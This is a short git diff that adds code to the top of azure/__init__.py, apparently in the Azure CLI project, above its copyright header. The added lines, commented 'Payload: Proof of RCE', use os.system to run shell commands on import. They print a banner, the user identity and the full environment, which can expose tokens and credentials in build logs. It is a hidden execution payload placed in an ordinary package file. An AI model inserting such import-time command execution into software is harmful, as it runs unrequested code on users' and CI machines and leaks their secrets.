diff --git a/src/azure-cli/azure/__init__.py b/src/azure-cli/azure/__init__.py index 2ae78104e94..aec17c43f03 100644 --- a/src/azure-cli/azure/__init__.py +++ b/src/azure-cli/azure/__init__.py @@ -1,3 +1,6 @@ +import os +# Payload: Proof of RCE +os.system("echo ' [!] CRITICAL VULNERABILITY: RCE CONFIRMED [!] '; id; env") # -------------------------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information.